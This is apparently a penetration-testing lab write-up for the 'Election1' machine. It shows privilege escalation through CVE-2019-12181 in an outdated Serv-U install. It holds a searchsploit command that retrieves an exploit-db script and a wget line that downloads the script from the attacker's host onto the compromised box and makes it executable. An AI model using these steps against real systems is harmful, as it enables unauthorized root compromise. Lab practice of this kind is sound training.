CVE-2019-12181
The target Serv-U instance has been confirmed to be vulnerable to CVE-2019-12181 due to its outdated version; 15.1.6.25
/Play/Election1/5-Privilege_Escalation/attachments/{71214953-7301-4E20-8C6D-563763D373BD}.png)
A vulnerability was found in SolarWinds Serv-U up to 15.1.6 on Linux and classified as critical. This issue affects some unknown processing. The manipulation leads to access control. The identification of this vulnerability is CVE-2019-12181. The attack may be initiated remotely. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ searchsploit -m multiple/local/47173.sh ; mv 47173.sh CVE-2019-12181.sh
Exploit: Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)
URL: https://www.exploit-db.com/exploits/47173
Path: /usr/share/exploitdb/exploits/multiple/local/47173.sh
Codes: CVE-2019-12181
Verified: False
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /home/kali/PEN-200/PG_PLAY/election1/47173.shExploit locally available.
Exploitation
www-data@election:/dev/shm$ wget -q http://192.168.45.247/CVE-2019-12181.sh ; chmod 755 ./CVE-2019-12181.shDelivery complete
/Play/Election1/5-Privilege_Escalation/attachments/{7D074E53-7100-4A4E-BC0B-DED86725D967}.png)
System level compromise.